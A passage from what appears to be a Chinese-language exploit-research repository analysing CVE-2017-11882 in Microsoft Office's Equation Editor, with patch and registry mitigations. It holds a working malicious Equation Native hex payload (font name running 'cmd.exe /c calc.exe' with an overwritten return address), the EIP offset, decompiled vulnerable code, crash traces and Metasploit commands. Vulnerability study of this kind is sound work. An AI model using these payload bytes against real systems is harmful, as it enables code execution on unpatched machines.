6 | A9 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该exp为0xA9(169),即下面的加亮部分 7 | 00 00 00 00 -> reserved1 8 | C8 A7 5C 00 -> reserved2 9 | C4 EE 5B 00 -> reserved3 10 | 00 00 00 00 -> reserved4 11 | 12 | ---- MTEFData ---- 13 | ---- MTEF header (version 2 and later) ---- 14 | 15 | 03 -> MTEF version 16 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 17 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 18 | 03 -> product version 19 | 0A -> product subversion 20 | 21 | ---- MTEF Byte Stream ---- 22 | 23 | 0A -> record SIZE 24 | 01 -> 25 | 08 -> FONT 26 | 5A -> typeface number 27 | 5A -> style 28 | 29 | ---- font name (null-terminated) ---- 30 | 63 6D 64 2E 65 78 65 20 2F 63 20 63 61 6C 63 2E 31 | 65 78 65 20 41 41 41 41 41 41 41 41 41 41 41 41 32 | 41 41 41 41 41 41 41 41 41 41 41 41 12 0C 43 00 33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | ---- EQNOLEFILEHDR ---- 49 | 50 | 1C 00 -> cbHdr 51 | 00 00 02 00 -> version 52 | FF C1 -> cf 53 | 24 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该正常rtf为0x24(36),即下面的加亮部分 54 | 00 00 00 00 -> reserved1 55 | 00 00 00 00 -> reserved2 56 | 1C DA 31 00 -> reserved3 57 | 00 00 00 00 -> reserved4 58 | 59 | ---- MTEFData ---- 60 | ---- MTEF header (version 2 and later) ---- 61 | 62 | 03 -> MTEF version 63 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 64 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 65 | 03 -> product version 66 | 0A -> product subversion 67 | 68 | ---- MTEF Byte Stream ---- 69 | 70 | 0A -> record SIZE 71 | 72 | 01 03 01 00 00 01 02 88 36 00 02 88 36 00 02 88 73 | 36 00 00 02 96 28 00 02 96 29 00 00 00 00 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | data = '' 85 | for i in range(0xFF): 86 | data += hex(i)[2:].zfill(2) 87 | print data 88 | 89 | 0102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebf 90 | 91 | c0c1c2c3c4c5c6c7c8c9cacbcccdcecf 92 | 93 | d0d1d2d3d4d5d6d7d8 d9dadbdc dddedf 94 | 95 | e0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe 96 | 97 | 98 | 99 | ChildEBP RetAddr Args to Child 100 | WARNING: Stack unwind information not available. Following frames may be wrong. 101 | 0012f228 302f2e2d 20333231 00000000 0012f248 EqnEdt32!FltToolbarWinProc+0x22d0 102 | 0012f26c 004218e4 0012f3ac 0012f5dc 0012f7dc 0x302f2e2d 103 | 0012f35c 004214e2 0012f3ac 00120000 00000001 EqnEdt32!FMDFontListEnum+0x650 104 | 0012f388 0043b466 0012f3ac 00120000 0012f5dc EqnEdt32!FMDFontListEnum+0x24e 105 | 0012f4b0 0043a8a0 0012f5dc 0012f7dc 00000006 EqnEdt32!MFEnumFunc+0xcc69 106 | 0012f4c8 0043a72f 00000008 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0xc0a3 107 | 0012f4e0 004375da 00000008 0012f534 0012f5dc EqnEdt32!MFEnumFunc+0xbf32 108 | 0012f544 0042f926 0012f55c 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0x8ddd 109 | 0012f574 00406a98 0035007c 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0x1129 110 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\RPCRT4.dll - 111 | 0012f5d8 76e502ca 00285a98 02905f90 00000202 EqnEdt32!AboutMathType+0x5a98 112 | 0012f5f4 76eb6311 00406881 0012f7e0 00000002 RPCRT4!NdrServerInitialize+0x3a1 113 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ole32.dll - 114 | 0012f9fc 773fe7e6 00275c80 00272730 002a8b80 RPCRT4!NdrStubCall2+0x23d 115 | 0012fa44 773fe876 00275c80 002a8b80 00272730 ole32!WdtpInterfacePointer_UserUnmarshal+0x256f 116 | 0012fa8c 773fedd0 002a8b80 00283b90 00285de0 ole32!WdtpInterfacePointer_UserUnmarshal+0x25ff 117 | 0012fad8 77318a13 002a8b80 002864c8 00275c80 ole32!WdtpInterfacePointer_UserUnmarshal+0x2b59 118 | 0012fbb4 77318908 00272730 00000000 00275c80 ole32!CoTaskMemFree+0x1b12 119 | 120 | 121 | first crash 0044C437 122 | 123 | second crash 002f2e2d ?? ??? 124 | 125 | 112f2e2d ?? ??? 126 | 127 | 128 | 0:000> uf 430c12 129 | EqnEdt32!MFEnumFunc+0x2415: 130 | 00430c12 ff151c684600 call dword ptr [EqnEdt32!FltToolbarWinProc+0x1c6b5 (0046681c)] 131 | 132 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh1.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh1.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh2.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh2.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh3.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh3.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/exploit-calc.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/exploit-calc.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/EQNOLEFILEHDR.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/EQNOLEFILEHDR.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Equation-Native.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/FONT-record.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/FONT-record.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-Load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-Load.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-interface.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/MTEF-Byte-Stream.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/MTEF-Byte-Stream.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/MTEF-header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/MTEF-header.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/ReadMTEFData.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/ReadMTEFData.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Tag-byte-structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Tag-byte-structure.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Test-rtf-Equation-Native.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Test-rtf-Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Test-rtf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Test-rtf.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/exploit-rtf-Equation-Native.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/exploit-rtf-Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/functions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/functions.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/interface.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/oleinit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/oleinit.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/ret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/ret.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/stackoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/stackoverflow.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/OleFileView.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/OleFileView.zip -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/exploit.md: -------------------------------------------------------------------------------- 1 | # 漏洞原理分析 2 | 3 | 调试环境: windows7_sp1_x86 + office 2007 x86 + windbg 6.12 x86 4 | 5 | EQNEDT32.EXE version: 2000.11.9.0 6 | 7 | 该漏洞位于实现OLE接口的IPersistStorage::Load函数中。sub_40415B为ole的初始化过程,如下图1所示,它调用了sub_40440A函数,sub_40440A的主要作用是在初始化EQNEDT32.EXE实现的COM接口的各个函数指针。 8 | 9 | ![](./Images/oleinit.png) 10 | 11 | (图一) 12 | 13 | 通过工具我们可以看到EQNEDT32.EXE实现了如下接口(图2):(工具为OleViewDotNet) 14 | 15 | ![](./Images/interface.png) 16 | 17 | (图二) 18 | 19 | 我们可以在EQNEDT32.EXE文件里面看到对这些接口的比较和使用,如图3所示: 20 | 21 | ![](./Images/IPersistStorage.png) 22 | 23 | (图三) 24 | 25 | 我们重点关注IPersistStorage接口,任何ole对象必须实现该接口,图4为微软对该接口的说明: 26 | 27 | ![](./Images/IPersistStorage-interface.png) 28 | 29 | (图四) 30 | 31 | 我们可以看到IPersistStorage接口的各个方法指针在 sub_40440A中被初始化,如图5所示: 32 | 33 | ![](./Images/IPersistStorage-Load.png) 34 | 35 | (图五) 36 | 37 | 图5中圈出的IPersistStorage::Load方法的主要用途是用来读入ole数据,在EQNEDT32.EXE中实现该方法后,即可被调用以读入MathType对应的ole数据,我们来看一下这个Load函数内部是怎么实现的,我们可以看到该函数的核心逻辑是打开并读入一个叫做“Equation Native”的流的数据(图6-1),在此基础上进一步读入MathType数据(图6-2): 38 | 39 | ![](./Images/Equation-Native.png) 40 | 41 | (图6.1) 42 | 43 | ![](./Images/ReadMTEFData.png) 44 | 45 | (图6.2) 46 | 47 | 我们来看一下这个“Equation Native”流来自哪里(图7),通过分析ole文件,我们可以看到该流的数据由用户所提供,正常情况下,流里面的数据代表一个MathType的公式,而恶意攻击者构造的数据可以如图7所示: 48 | 49 | ![](./Images/exploit-rtf-Equation-Native.png) 50 | 51 | (图7) 52 | 53 | 漏洞的直接触发原因为:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出,如图8所示。从图9可以看出,函数给v12变量分配的大小是0x24个字节,超过该大小就会造成溢出,从而覆盖不远处的eip,达到劫持程序执行流的目的,从v12开始算起,eip的位置为+0x2c,即44,再往前覆盖就是调用参数。 54 | 55 | ![](./Images/stackoverflow.png) 56 | 57 | (图8) 58 | 59 | ![](./Images/ret.png) 60 | 61 | (图9) 62 | 63 | 整个漏洞执行过程的步骤如图10所示 64 | 65 | ![](./Images/functions.png) 66 | 67 | (图10) 68 | 69 | 在构造exp寻找偏移时,在strstr函数中发生了一次不可利用的crash.原因是strstr函数中引用我们控制的内容所指向的内存(如下代码片段)。所以需要在构造时设置'\x00'截断 70 | 71 | v2 = *(_BYTE *)buffer; 72 | 73 | 74 | 75 | # 从零开始构造exp 76 | 77 | 完全按照[银雁冰](https://www.anquanke.com/post/id/87311)大牛的文章进行.最终弹出了calc.exe 78 | 79 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/knowledge.md: -------------------------------------------------------------------------------- 1 | # 一些知识 2 | ## poi 3 | 4 | 如果一个地址为0×00123456的指针, 指向地址0×00420000 5 | 那么下面两条指令是等价的: 6 | 7 | 0:000> dd 420000 8 | 0:000> dd poi(123456) 9 | 10 | ## dds dqs dps 11 | dds、dps和dqs命令显示给定范围内存的内容,它们是把内存区域转储出来,并把内存中每个元素都视为一个符号对其进行解析,dds是四字节视为一个符号,dqs是每8字节视为一个符号,dps是根据当前处理器架构来选择最合适的长度 12 | 13 | ## 数据对象和数据源 (OLE) 14 | 15 | 使用剪贴板或拖放时,可以将执行的数据传输,因此,数据源有一个和一个目标。 一个应用程序对复制的数据,而另一应用程序接受它粘贴的。 转发需要的每端对相同数据的不同操作但为了向前成功。 Microsoft 基础类 (MFC)库提供表示此转发的每端的两类: 16 | 17 | 实现的数据源 (由 COleDataSource 对象表示) 传输数据的源端。 这些按源应用程序创建数据,则将复制到剪贴板时,或者在拖放操作的数据时提供。 18 | 19 | 实现的数据对象 (由 COleDataObject 对象表示) 数据传输的目标边。 它们创建时,目的应用的数据删除到该时,或者当请求运行从剪贴板中粘贴操作。 20 | 21 | ## 工具 22 | 23 | 利用oletools中的rtfobj将rtf中的ole数据dump出来 24 | 再利用OleFileView查看关键结构及其内容 25 | 26 | ## IPersistStorage 27 | 28 | IPersistStorage:使容器应用程序能够将存储对象传递给其包含的对象之一,并加载和保存存储对象。 29 | 30 | ## msfconsole 31 | 32 | $ search CVE-2017-11882 33 | $ use exploit/windows/fileformat/office_ms17_11882 34 | $ info 35 | 36 | 37 | ## Equation Native数据结构 38 | 39 | 结构体来源: 40 | 41 | http://rtf2latex2e.sourceforge.net/MTEF3.html#header_v2+ 42 | http://web.archive.org/web/20010304111449/http://mathtype.com:80/support/tech/MTEF_storage.htm 43 | 44 | Equation Native = EQNOLEFILEHDR + MTEFData 45 | 其中 MTEFData = MTEF header + MTEF Byte Stream 46 | 47 | EQNOLEFILEHDR的结构如下(图1): 48 | 49 | 50 | ![](./Images/EQNOLEFILEHDR.png) 51 | 52 | (图1) 53 | 54 | 55 | MTEF header的结构如下(图2),实际发现通过office 2007插入的公式其product subversion字段恒定为0x0A,这与下图有所出入: 56 | 57 | 58 | ![](./Images/MTEF-header.png) 59 | 60 | (图2) 61 | 62 | 63 | MTEF Byte Stream的结构如下(图3),可以看到它由一个SIZE record及后续的一些record构成,各种record的类别如图(图4)所示,其中对于本次漏洞相关的Font record的说明如图(图5)所示。 64 | 65 | 66 | ![](./Images/MTEF-Byte-Stream.png) 67 | 68 | (图3) 69 | 70 | 71 | 72 | ![](./Images/Tag-byte-structure.png) 73 | 74 | (图4) 75 | 76 | 77 | 78 | ![](./Images/FONT-record.png) 79 | 80 | (图5) 81 | 82 | 83 | ## exploit.rtf中的Equation Native数据 84 | 85 | 86 | ![](./Images/exploit-rtf-Equation-Native.png) 87 | 88 | **(图6)** 89 | 90 | 91 | ---- EQNOLEFILEHDR ---- 92 | 93 | 1C 00-> cbHdr 94 | 00 00 02 00 -> version 95 | 9E C4 -> cf 96 | A9 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该exp为0xA9(169),即下面从MTEF header开始的直到结束的部分 97 | 00 00 00 00 -> reserved1 98 | C8 A7 5C 00 -> reserved2 99 | C4 EE 5B 00 -> reserved3 100 | 00 00 00 00 -> reserved4 101 | 102 | ---- MTEFData ---- 103 | ---- MTEF header (version 2 and later) ---- 104 | 105 | 03 -> MTEF version 106 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 107 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 108 | 03 -> product version 109 | 0A -> product subversion 110 | 111 | ---- MTEF Byte Stream ---- 112 | 113 | 0A -> record SIZE 114 | 01 -> 115 | 08 -> FONT 116 | 5A -> typeface number 117 | 5A -> style 118 | 119 | ---- font name (null-terminated) ---- 120 | 63 6D 64 2E 65 78 65 20 2F 63 20 63 61 6C 63 2E 121 | 65 78 65 20 41 41 41 41 41 41 41 41 41 41 41 41 122 | 41 41 41 41 41 41 41 41 41 41 41 41 12 0C 43 00 123 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 124 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 125 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 126 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 127 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 128 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 129 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 130 | 131 | ## 正常rtf中的Equation Native数据 132 | 133 | ![](./Images/Test-rtf.png) 134 | 135 | **(图7)** 136 | 137 | 138 | 139 | ![](./Images/Test-rtf-Equation-Native.png) 140 | 141 | **(图8)** 142 | 143 | 144 | ---- EQNOLEFILEHDR ---- 145 | 146 | 1C 00-> cbHdr 147 | 00 00 02 00 -> version 148 | FF C1 -> cf 149 | 24 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该正常rtf为0x24(36),即下面从MTEF header开始的直到结束的部分 150 | 00 00 00 00 -> reserved1 151 | 00 00 00 00 -> reserved2 152 | 1C DA 31 00 -> reserved3 153 | 00 00 00 00 -> reserved4 154 | 155 | ---- MTEFData ---- 156 | ---- MTEF header (version 2 and later) ---- 157 | 158 | 03 -> MTEF version 159 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 160 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 161 | 03 -> product version 162 | 0A -> product subversion 163 | 164 | ---- MTEF Byte Stream ---- 165 | 166 | 0A -> record SIZE 167 | 168 | 01 03 01 00 00 01 02 88 36 00 02 88 36 00 02 88 169 | 36 00 00 02 96 28 00 02 96 29 00 00 00 00 170 | 171 | 通过上面的观察我们已经发现,所有插入的Equation Native数据在截止到SIZE record的数据排布都是一致的,不同之处在于恶意的Equation Native在SIZE record后放了一个Font record,其数据构成为: 172 | 173 | Font record = tag(固定为8,占一个字节) + typeface(占一个字节) + style(占一个字节) + font_name(以0x00结尾的字符串) 174 | 175 | 观察发现typeface和style这两个字节比较随意(分析多个poc里面这两个字节并不相同),实际构造时,我把两个字节改成其他的一些值(例如全为0)并不影响漏洞的触发。 176 | 177 | ## 对Equation Native数据的具体解析 178 | 179 | Eqnedt32在如下位置读入font tag. 180 | 181 | int __cdecl sub_43755C(int a1) 182 | { 183 | int result; // eax@1 184 | int v2; // eax@5 185 | int v3; // ST48_4@6 186 | int v4; // ST34_4@20 187 | int v5; // ST28_4@41 188 | int v6; // [sp+18h] [bp-3Ch]@24 189 | int v7; // [sp+18h] [bp-3Ch]@37 190 | int v8; // [sp+1Ch] [bp-38h]@25 191 | int i; // [sp+24h] [bp-30h]@17 192 | int v10; // [sp+2Ch] [bp-28h]@9 193 | int v11; // [sp+30h] [bp-24h]@6 194 | int v12; // [sp+38h] [bp-1Ch]@0 195 | __int16 v13; // [sp+3Ch] [bp-18h]@5 196 | int v14; // [sp+40h] [bp-14h]@9 197 | int v15; // [sp+40h] [bp-14h]@32 198 | __int16 v16; // [sp+44h] [bp-10h]@5 199 | int v17; // [sp+4Ch] [bp-8h]@8 200 | int v18; // [sp+50h] [bp-4h]@1 201 | 202 | v18 = *(_DWORD *)(dword_45B380 + 4); 203 | sub_426ADE(); 204 | result = a1; 205 | if ( *(_DWORD *)(a1 + 8) ) 206 | { 207 | sub_420E60(); 208 | sub_420E72(1); 209 | if ( sub_43A988(a1, v18) ) 210 | { 211 | if ( !*(_DWORD *)(v18 + 46) ) 212 | sub_4318E1(v18); 213 | LOWORD(v2) = (unsigned __int8)inc_and_get_byte_from_counter_offset();// Read font tag(8) 214 | v13 = sub_43A720(v2, &v16); 215 | 216 | 随后将tag传入sub_43A720函数,并进一步传入其子函数sub_43A87A进行判断,如下所示: 217 | 218 | __int16 __cdecl sub_43A87A(__int16 a1) 219 | { 220 | while ( 1 ) 221 | { 222 | if ( (a1 & 0xF) == 8 ) ------> 此处堆font 数据进行处理 223 | { 224 | sub_43B418(); 225 | goto LABEL_5; 226 | } 227 | if ( (a1 & 0xF) < 9 ) 228 | return a1; 229 | sub_43B1D0(a1, &word_45B246, &word_45B244); 230 | LABEL_5: 231 | a1 = (unsigned __int8)inc_and_get_byte_from_counter_offset(); 232 | } 233 | } 234 | 235 | 在sub_43B418函数中,首先读取font record中代表typeface和style的两个字节,如下所示: 236 | 237 | int sub_43B418() 238 | { 239 | __int16 v0; // ST18_2@1 240 | int result; // eax@1 241 | char v2; // [sp+14h] [bp-104h]@1 242 | 243 | v0 = (unsigned __int8)inc_and_get_byte_from_counter_offset(); ---> typeface 244 | inc_and_get_byte_from_counter_offset(); ----> style 245 | sub_4164FA(&v2); 246 | result = sub_4214C6(&v2); 247 | word_45ABE6[v0] = result; 248 | return result; 249 | } 250 | 251 | 随后的sub_4164FA开始逐个读入字节读入font name的数据,直到遇到一个NULL,如下所示 252 | 253 | char *__cdecl sub_4164FA(char *a1) 254 | { 255 | char *v1; // ST0C_4@1 256 | char *result; // eax@2 257 | 258 | do 259 | { 260 | v1 = a1++; 261 | *v1 = inc_and_get_byte_from_counter_offset(); 262 | } 263 | while ( *v1 ); 264 | result = a1; 265 | *a1 = 0; 266 | return result; 267 | } 268 | 269 | 读入font name后,再调用sub_4214A6函数进行一些处理,由于前面读入的font name数据过长,从而导致在sub_4214A6函数内部再进入几层调用后导致栈溢出 270 | 271 | __int16 __cdecl sub_4214C6(int buffer, int a2) 272 | { 273 | __int16 v3; // [sp+Ch] [bp-8h]@1 274 | int v4; // [sp+10h] [bp-4h]@1 275 | 276 | LongFont_struct_Overflow(buffer, a2, 1, &v4); 277 | v3 = sub_421D5D(v4); 278 | if ( !v3 ) 279 | v3 = sub_421DB8(v4); 280 | sub_42159A(); 281 | return v3; 282 | } 283 | 284 | 285 | 286 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/patch.md: -------------------------------------------------------------------------------- 1 | ## 影响版本 2 | 3 | Office 365 4 | Microsoft Office 2000 5 | Microsoft Office 2003 6 | Microsoft Office 2007 Service Pack 3 7 | Microsoft Office 2010 Service Pack 2 8 | Microsoft Office 2013 Service Pack 1 9 | Microsoft Office 2016 10 | 11 | ## 漏洞动态检测及防御 12 | ### 0x00 13 | 14 | 该漏洞的动态防御特别简单,因为是栈缓冲区拷贝时溢出,所以校验待拷贝长度是否超过缓冲区的长度即可,微软在补丁里面把溢出校验长度设置为0x20,比实际少4个字节,可能为了保险起见吧。 15 | 16 | ### 0x01 17 | 18 | (1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补 19 | 20 | (2)开启Windows Update功能,定期对系统进行自动更新 21 | 22 | (3)在注册表中禁用该漏洞模块 23 | 24 | reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 25 | 26 | reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400 27 | 28 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/skills.md: -------------------------------------------------------------------------------- 1 | ## 修改过的ole替换正常的ole 2 | 1.对于word 3 | 4 | 对一个docx文件来说,就是用压缩软件替换 5 | 6 | word/embeddings/oleObject1.bin 7 | 8 | 这个文件,然后重新保存成docx即可 9 | 10 | 2.对于rtf 11 | 12 | ...不知道 13 | 14 | ## WinDbg调试器:启动程序时自动连接调试器方法 15 | 16 | 第一步:注册表展开到**HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options**路径下; 17 | 18 | 第二步:在**Image File Execution Options**上鼠标右键,新建“项”,项名为你要调试的程序,比如我调试QQ,那就把项名改为qq.exe; 19 | 20 | 第三步:在项名上,右键,新建字符串值**“Debugger”**,然后双击“Debugger”字符串值,输入Windbg完整目录即可; 21 | 22 | 此时,你启动qq时,会直接启动windbg附加 23 | 24 | ## 各式工具 25 | 26 | oleviewdotnet:本机所实现的OLE/COM对象查看器 .net版本 27 | https://github.com/tyranid/oleviewdotnet 28 | 29 | oletools:将rtf中的ole对象分离出来等等 30 | https://github.com/decalage2/oletools 31 | 32 | GUID-Finder:ida插件,可自动分析可执行文件实现的OLE/COM接口 33 | https://github.com/nihilus/GUID-Finder 34 | 35 | OleFileView:可视化界面查看ole对象各项的的16进制 36 | https://github.com/moonAgirl/Exploit/tree/master/CVE-2017-11882/OleFileView.zip 37 | 38 | 39 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/CVE-2018-4878-master.zip: -------------------------------------------------------------------------------- 